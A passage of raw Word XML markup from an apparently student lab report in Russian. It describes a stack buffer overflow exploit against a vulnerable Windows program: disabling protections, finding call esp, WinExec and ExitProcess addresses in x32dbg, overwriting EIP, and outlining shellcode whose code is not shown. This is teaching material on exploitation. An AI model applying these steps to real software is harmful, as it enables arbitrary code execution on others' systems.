      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E08D5B1" wp14:editId="320F5391">
            <wp:extent cx="4569151" cy="1130300"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="1976930743" name="Рисунок 1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0743" name="Рисунок 1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378" cy="11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BD3A" w14:textId="74A66A0F" w:rsidR="007949C2" w:rsidRPr="00BF640E" w:rsidRDefault="007949C2" w:rsidP="007949C2">
      <w:pPr>
        <w:pStyle w:val="af6"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF640E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF640E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00BF640E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Рисунок \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00BF640E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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF640E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00BF640E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> - отключение защиты</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794BAC41" w14:textId="77777777" w:rsidR="007949C2" w:rsidRDefault="007949C2" w:rsidP="007949C2">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:ind w:left="709" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A5A5D83" w14:textId="77777777" w:rsidR="007949C2" w:rsidRDefault="007949C2" w:rsidP="007949C2">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37AC1043" wp14:editId="2C688211">
            <wp:extent cx="4616450" cy="1219570"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="228568244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8244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272" cy="12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56FD" w14:textId="19761801" w:rsidR="007949C2" w:rsidRPr="00BF640E" w:rsidRDefault="007949C2" w:rsidP="007949C2">
      <w:pPr>
        <w:pStyle w:val="af6"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF640E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF640E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00BF640E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Рисунок \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00BF640E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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF640E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00BF640E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> - отключение защиты</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D8E5BC" w14:textId="77777777" w:rsidR="007949C2" w:rsidRDefault="007949C2" w:rsidP="007949C2">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:ind w:left="709" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="482667CF" w14:textId="77777777" w:rsidR="007949C2" w:rsidRDefault="007949C2" w:rsidP="007949C2">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="289B2903" wp14:editId="4805DE71">
            <wp:extent cx="4591050" cy="1516686"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="1115669624" name="Рисунок 1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9624" name="Рисунок 1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820" cy="15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2B92" w14:textId="58052456" w:rsidR="007949C2" w:rsidRDefault="007949C2" w:rsidP="007949C2">
      <w:pPr>
        <w:pStyle w:val="af6"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF640E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF640E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00BF640E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Рисунок \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00BF640E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3</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF640E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00BF640E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> - отключение защиты</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D8CB51" w14:textId="77777777" w:rsidR="00BF640E" w:rsidRPr="00BF640E" w:rsidRDefault="00BF640E" w:rsidP="00BF640E">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EF38911" w14:textId="658902F4" w:rsidR="007949C2" w:rsidRPr="00BF640E" w:rsidRDefault="00BF640E" w:rsidP="00BF640E">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:ind w:left="709" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Поиск адресов</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F48527" w14:textId="1549FCCA" w:rsidR="00BF640E" w:rsidRPr="00D76A9C" w:rsidRDefault="00BF640E" w:rsidP="00BF640E">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:ind w:left="709" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Для поиска адресов </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>call</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF640E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>esp</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF640E">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ExitProcess</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF640E">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WinExec</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF640E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">использовался отладчик </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF640E">
        <w:t>32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dbg</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF640E">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Адрес </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>call</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF640E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>esp</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF640E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">используется для замены на него адреса возврата, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ExitProcess</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF640E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">для завершения работы программы, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WinExec</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF640E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">для запуска нового процесса. </w:t>
      </w:r>
      <w:r w:rsidR="00D76A9C">
        <w:t xml:space="preserve">Рассмотрев то, что хранится в стеке через дизассемблер, можно заметить то, что </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00D76A9C">
        <w:t>при передачи</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00D76A9C">
        <w:t xml:space="preserve"> 20 (\</w:t>
      </w:r>
      <w:r w:rsidR="00D76A9C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00D76A9C" w:rsidRPr="00D76A9C">
        <w:t>66)</w:t>
      </w:r>
      <w:r w:rsidR="00D76A9C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D76A9C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EIP</w:t>
      </w:r>
      <w:r w:rsidR="00D76A9C" w:rsidRPr="00D76A9C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D76A9C">
        <w:t xml:space="preserve">и </w:t>
      </w:r>
      <w:r w:rsidR="00D76A9C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EBP</w:t>
      </w:r>
      <w:r w:rsidR="00D76A9C" w:rsidRPr="00D76A9C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D76A9C">
        <w:t>заполняются символами «</w:t>
      </w:r>
      <w:r w:rsidR="00D76A9C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidR="00D76A9C">
        <w:t>», а это значит, что «</w:t>
      </w:r>
      <w:r w:rsidR="00D76A9C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidR="00D76A9C">
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00D76A9C" w:rsidRPr="00D76A9C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D76A9C">
        <w:t>хранятся там же, где и адреса возвратов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74304AFF" w14:textId="77777777" w:rsidR="00BF640E" w:rsidRDefault="00BF640E" w:rsidP="00BF640E">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40A9386F" wp14:editId="702C72EF">
            <wp:extent cx="2751058" cy="1905165"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6610781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81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95ED" w14:textId="102D350D" w:rsidR="00BF640E" w:rsidRPr="005E71E3" w:rsidRDefault="00BF640E" w:rsidP="00BF640E">
      <w:pPr>
        <w:pStyle w:val="af6"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E71E3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidRPr="005E71E3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="005E71E3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Рисунок \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="005E71E3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4</w:t>
      </w:r>
      <w:r w:rsidRPr="005E71E3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="005E71E3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> - найденый адрес </w:t>
      </w:r>
      <w:r w:rsidRPr="005E71E3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>call</w:t>
      </w:r>
      <w:r w:rsidRPr="005E71E3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E71E3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>esp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCF483E" w14:textId="77777777" w:rsidR="005E71E3" w:rsidRPr="005E71E3" w:rsidRDefault="005E71E3" w:rsidP="005E71E3">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F21299D" w14:textId="77777777" w:rsidR="005E71E3" w:rsidRDefault="005E71E3" w:rsidP="005E71E3">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04265723" wp14:editId="560ACDD2">
            <wp:extent cx="5038213" cy="1181100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1019361568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1568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637" cy="11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CD6C" w14:textId="15781D4C" w:rsidR="005E71E3" w:rsidRPr="005E71E3" w:rsidRDefault="005E71E3" w:rsidP="005E71E3">
      <w:pPr>
        <w:pStyle w:val="af6"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E71E3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidRPr="005E71E3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="005E71E3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Рисунок \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="005E71E3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5</w:t>
      </w:r>
      <w:r w:rsidRPr="005E71E3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="005E71E3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="005E71E3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">найденый адрес </w:t>
      </w:r>
      <w:r w:rsidRPr="005E71E3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WinExec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7531553F" w14:textId="77777777" w:rsidR="005E71E3" w:rsidRDefault="005E71E3" w:rsidP="005E71E3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CAA5ACE" w14:textId="77777777" w:rsidR="005E71E3" w:rsidRDefault="005E71E3" w:rsidP="005E71E3">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14BC005F" wp14:editId="338F0BE0">
            <wp:extent cx="5054600" cy="1542055"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="140031718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718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414" cy="15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4D54" w14:textId="79A1285C" w:rsidR="005E71E3" w:rsidRDefault="005E71E3" w:rsidP="005E71E3">
      <w:pPr>
        <w:pStyle w:val="af6"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E71E3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidRPr="005E71E3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="005E71E3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Рисунок \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="005E71E3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6</w:t>
      </w:r>
      <w:r w:rsidRPr="005E71E3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="005E71E3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> - найденый адрес </w:t>
      </w:r>
      <w:r w:rsidRPr="005E71E3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ExitProcess</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2349661C" w14:textId="77777777" w:rsidR="00D76A9C" w:rsidRDefault="00D76A9C" w:rsidP="00D76A9C">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="709A275B" w14:textId="77777777" w:rsidR="00D76A9C" w:rsidRDefault="00D76A9C" w:rsidP="00D76A9C">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B16306E" wp14:editId="5A9D778D">
            <wp:extent cx="4413250" cy="2220414"/>
            <wp:effectExtent l="0" t="0" r="6350" b="8890"/>
            <wp:docPr id="165040424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424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862" cy="22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664" w14:textId="01AE4DC4" w:rsidR="00D76A9C" w:rsidRPr="00D76A9C" w:rsidRDefault="00D76A9C" w:rsidP="00D76A9C">
      <w:pPr>
        <w:pStyle w:val="af6"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D76A9C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidRPr="00D76A9C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00D76A9C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Рисунок \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00D76A9C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7</w:t>
      </w:r>
      <w:r w:rsidRPr="00D76A9C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D76A9C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> - уязвимая программа в дизассемблере</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79219001" w14:textId="2690F300" w:rsidR="00BF640E" w:rsidRPr="005E71E3" w:rsidRDefault="005E71E3" w:rsidP="005E71E3">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:ind w:left="709" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>Создание шелл-кода</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD69A33" w14:textId="2C739B95" w:rsidR="005E71E3" w:rsidRDefault="005E71E3" w:rsidP="005E71E3">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:ind w:left="709" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>Был написан шелл-код в виде ассемблерных инструкций (см. приложение Б).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EC9E03" w14:textId="1D94A280" w:rsidR="005E71E3" w:rsidRDefault="005E71E3" w:rsidP="005E71E3">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:ind w:left="709" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>Структура кода</w:t>
      </w:r>
      <w:r w:rsidRPr="005E71E3">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1) </w:t>
      </w:r>
      <w:r w:rsidRPr="005E71E3">
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BITS</w:t>
      </w:r>
      <w:r w:rsidRPr="005E71E3">
        <w:t xml:space="preserve"> 32] </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="005E71E3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">указывает, что код предназначен для 32-битной архитектуры. 2) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>section</w:t>
      </w:r>
      <w:r w:rsidRPr="005E71E3">
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:r w:rsidRPr="005E71E3">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">определяет секцию кода. 3) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>global</w:t>
      </w:r>
      <w:r w:rsidRPr="005E71E3">
        <w:t xml:space="preserve"> _</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>start</w:t>
      </w:r>
      <w:r w:rsidRPr="005E71E3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="005E71E3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>объявляет точку входа _</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>start</w:t>
      </w:r>
      <w:r w:rsidRPr="005E71E3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">как глобальную. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159B7632" w14:textId="77777777" w:rsidR="000027CF" w:rsidRDefault="005E71E3" w:rsidP="005E71E3">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:ind w:left="709" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>Как</w:t>
      </w:r>
      <w:r w:rsidRPr="000027CF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>работает</w:t>
      </w:r>
      <w:r w:rsidRPr="000027CF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>код</w:t>
      </w:r>
      <w:r w:rsidRPr="000027CF">
        <w:t xml:space="preserve">: 1) </w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>jmp</w:t>
      </w:r>
      <w:r w:rsidR="000027CF" w:rsidRPr="000027CF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>short</w:t>
      </w:r>
      <w:r w:rsidR="000027CF" w:rsidRPr="000027CF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:r w:rsidR="000027CF" w:rsidRPr="000027CF">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>command</w:t>
      </w:r>
      <w:r w:rsidR="000027CF" w:rsidRPr="000027CF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="000027CF" w:rsidRPr="000027CF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:t xml:space="preserve">переход к метке </w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:r w:rsidR="000027CF" w:rsidRPr="000027CF">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>command</w:t>
      </w:r>
      <w:r w:rsidR="000027CF" w:rsidRPr="000027CF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:t xml:space="preserve">для пропуска непосредственного выполнения кода команды. 2) </w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:r w:rsidR="000027CF" w:rsidRPr="000027CF">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>command</w:t>
      </w:r>
      <w:r w:rsidR="000027CF" w:rsidRPr="000027CF">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:t xml:space="preserve">вызывает </w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>execute</w:t>
      </w:r>
